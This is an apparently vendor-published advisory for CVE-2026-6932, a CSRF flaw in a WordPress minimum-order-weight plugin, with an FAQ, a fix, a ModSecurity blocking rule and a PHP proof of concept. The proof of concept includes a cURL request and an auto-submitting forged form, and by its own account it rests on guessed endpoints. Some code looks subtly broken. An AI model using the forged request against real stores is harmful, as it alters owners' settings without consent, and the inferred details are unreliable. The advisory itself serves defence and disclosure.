What is CVE-2026-6932?

CVE-2026-6932 is a Cross-Site Request Forgery (CSRF) vulnerability in the Woo Commerce Minimum Weight plugin for WordPress. It allows unauthenticated attackers to modify the minimum order weight setting by tricking an authenticated site administrator into submitting a forged request.

How does this vulnerability work?

The vulnerability arises from missing nonce verification on the settings update handler in the plugin. An attacker can create a malicious link that, when clicked by an administrator, sends a forged POST request to the vulnerable endpoint, altering the minimum weight setting without authorization.

Who is affected by this vulnerability?

Any WordPress site using the Woo Commerce Minimum Weight plugin version 3.0.1 or earlier is affected. Site administrators should check their installed plugins and update to a patched version to mitigate the risk.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Woo Commerce Minimum Weight plugin in your WordPress admin dashboard. If it is version 3.0.1 or earlier, your site is at risk and should be updated immediately.

What is the recommended fix for this vulnerability?

To fix this vulnerability, update the Woo Commerce Minimum Weight plugin to the latest version where the nonce verification has been implemented. Additionally, developers should ensure that nonce checks are included in the settings update handler.

What does the CVSS score of 4.3 mean?

The CVSS score of 4.3 indicates a medium severity level for this vulnerability. This means that while exploitation requires user interaction, it can lead to significant issues, such as unauthorized changes to critical settings that affect store operations.

What are the potential impacts of this vulnerability?

Successful exploitation can allow an attacker to change the minimum order weight setting, potentially bypassing weight-based restrictions or causing denial of service by setting it to an extreme value. This can disrupt e-commerce operations and lead to financial losses.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can send a crafted POST request to the vulnerable endpoint without a nonce. It shows the parameters that can be manipulated and how the absence of nonce verification allows unauthorized changes to the minimum weight setting.

What is a nonce and why is it important?

A nonce is a security token used in WordPress to verify that a request comes from a legitimate source. It helps prevent CSRF attacks by ensuring that form submissions are valid and intentional. Missing nonce checks can expose plugins to exploitation.

How can I secure my WordPress site against CSRF vulnerabilities?

To secure your WordPress site against CSRF vulnerabilities, always ensure that nonce fields are included in forms and that they are verified on submission. Regularly update plugins and themes, and conduct security audits to identify potential weaknesses.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 11, 2026

CVE-2026-6932: Woo Commerce Minimum Weight <= 3.0.1 – Cross-Site Request Forgery via Settings Update Form (woo-commerce-min-weight)

CVE ID CVE-2026-6932

Plugin woo-commerce-min-weight

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 3.0.1

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6932 (metadata-based): This is a Cross-Site Request Forgery (CSRF) vulnerability in the Woo Commerce Minimum Weight plugin versions up to and including 3.0.1. The plugin fails to validate a nonce on the settings update handler in edit-weight.php, allowing an unauthenticated attacker to trick a site administrator into modifying the minimum order weight setting via a crafted request.

Root Cause: The vulnerability stems from missing nonce verification on the settings update handler. Based on the CWE-352 classification and description, the handler in edit-weight.php likely processes POST requests to update plugin settings (minimum weight threshold) without checking a WordPress nonce. This is a common omission in custom admin pages where developers forget to include wp_nonce_field() in the form and check the nonce with wp_verify_nonce() on submission. Atomic Edge analysis infers this from the CWE and description; no source code was available to confirm.

Exploitation: An attacker creates a malicious HTML page or link that, when visited by an authenticated administrator, sends a forged POST request to the vulnerable endpoint. The likely target URL is /wp-admin/admin-post.php?action=wc_min_weight_update or /wp-content/plugins/woo-commerce-min-weight/edit-weight.php. The forged request would include parameters such as ‘min_weight’ set to an attacker-chosen value (e.g., 0 or a very high number). Since there is no nonce check, WordPress processes the request, changing the minimum order weight setting to disrupt store operations or bypass weight-based restrictions.

Remediation: The plugin should implement a nonce check on the settings handler. Developers must add wp_nonce_field(‘wc_min_weight_settings’, ‘_wpnonce’) to the settings form and verify it with if (!isset($_POST[‘_wpnonce’]) || !wp_verify_nonce($_POST[‘_wpnonce’], ‘wc_min_weight_settings’)) { wp_die(‘Security check failed.’); } in the handler. This aligns with WordPress security best practices and the CSRF vulnerability pattern.

Impact: Successful exploitation allows an attacker to modify the minimum order weight setting without authorization. This can lead to business logic abuse: setting the minimum weight to zero bypasses weight-based restrictions, or setting it to an extremely high value prevents any orders from being placed, causing denial of service for the e-commerce store. The CVSS v3.1 score is 4.3 (Medium) due to the need for user interaction and limited impact on integrity only, no confidentiality or availability impact.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6932 (metadata-based)
# Block CSRF attack against Woo Commerce Minimum Weight settings update
# This rule blocks POST requests to admin-post.php with action wc_min_weight_update
# and the min_weight parameter that lacks a valid nonce (attacker's signature)

SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" 
    "id:20261932,phase:2,deny,status:403,chain,msg:'CVE-2026-6932 CSRF attempt via WooCommerce Min Weight settings',severity:'CRITICAL',tag:'CVE-2026-6932',tag:'wordpress',tag:'csrf'"
    SecRule ARGS_POST:action "@streq wc_min_weight_update" 
        "chain"
        SecRule ARGS_POST:min_weight "@rx ^d+$" 
            "t:none"
            # Note: This rule may have false positives if legitimate admin requests also lack nonce.
            # The absence of a nonce check IS the vulnerability, but at WAF level we cannot
            # verify nonces. This rule provides a surgical block on the specific action and parameter.
            # Consider disabling if legitimate admin requests use this same route without nonce.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6932 - Woo Commerce Minimum Weight <= 3.0.1 - Cross-Site Request Forgery via Settings Update Form

// Configuration
$target_url = 'http://example.com/wp-admin/admin-post.php'; // Change to target WordPress site
$action_hook = 'wc_min_weight_update'; // Inferred action hook based on plugin slug
$nonce_field = '_wpnonce'; // Will be absent in vulnerable version

// Prepare POST data (min_order_weight parameter inferred from plugin purpose)
$post_data = array(
    'action' => $action_hook,
    'min_weight' => '0', // Attacker sets minimum weight to 0 to bypass restrictions
    'min_weight_note' => 'Updated via CSRF'
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only; use true in production
curl_setopt($ch, CURLOPT_COOKIE, 'admin_cookie_here'); // Placeholder: attacker needs admin session cookie? No, CSRF tricks admin.

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output result
echo "HTTP Response Code: " . $http_code . "n";
echo "Response Body: " . substr($response, 0, 500) . "n";
echo "[+] If the request succeeded, the minimum weight setting has been changed to 0.n";
echo "[+] Note: This PoC assumes the admin is already authenticated via session cookies. In a real CSRF attack, the crafted form would be served from an attacker-controlled page and submitted via an admin's browser automatically.n";

// Alternative: For direct form submission (more realistic CSRF), use the following HTML payload:
// <form action='http://example.com/wp-admin/admin-post.php' method='POST'>
// <input type='hidden' name='action' value='wc_min_weight_update'>
// <input type='hidden' name='min_weight' value='0'>
// <input type='submit' value='Submit'>
// </form>
// <script>document.forms[0].submit();</script>

Frequently Asked Questions

What is CVE-2026-6932?
Understanding the vulnerability
CVE-2026-6932 is a Cross-Site Request Forgery (CSRF) vulnerability in the Woo Commerce Minimum Weight plugin for WordPress. It allows unauthenticated attackers to modify the minimum order weight setting by tricking an authenticated site administrator into submitting a forged request.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing nonce verification on the settings update handler in the plugin. An attacker can create a malicious link that, when clicked by an administrator, sends a forged POST request to the vulnerable endpoint, altering the minimum weight setting without authorization.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Woo Commerce Minimum Weight plugin version 3.0.1 or earlier is affected. Site administrators should check their installed plugins and update to a patched version to mitigate the risk.
How can I check if my site is vulnerable?
Verifying plugin versions
To determine if your site is vulnerable, check the version of the Woo Commerce Minimum Weight plugin in your WordPress admin dashboard. If it is version 3.0.1 or earlier, your site is at risk and should be updated immediately.
What is the recommended fix for this vulnerability?
Mitigation steps
To fix this vulnerability, update the Woo Commerce Minimum Weight plugin to the latest version where the nonce verification has been implemented. Additionally, developers should ensure that nonce checks are included in the settings update handler.
What does the CVSS score of 4.3 mean?
Understanding risk levels
The CVSS score of 4.3 indicates a medium severity level for this vulnerability. This means that while exploitation requires user interaction, it can lead to significant issues, such as unauthorized changes to critical settings that affect store operations.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation can allow an attacker to change the minimum order weight setting, potentially bypassing weight-based restrictions or causing denial of service by setting it to an extreme value. This can disrupt e-commerce operations and lead to financial losses.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration
The proof of concept illustrates how an attacker can send a crafted POST request to the vulnerable endpoint without a nonce. It shows the parameters that can be manipulated and how the absence of nonce verification allows unauthorized changes to the minimum weight setting.
What is a nonce and why is it important?
Nonce verification in WordPress
A nonce is a security token used in WordPress to verify that a request comes from a legitimate source. It helps prevent CSRF attacks by ensuring that form submissions are valid and intentional. Missing nonce checks can expose plugins to exploitation.
How can I secure my WordPress site against CSRF vulnerabilities?
Best practices for security
To secure your WordPress site against CSRF vulnerabilities, always ensure that nonce fields are included in forms and that they are verified on submission. Regularly update plugins and themes, and conduct security audits to identify potential weaknesses.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations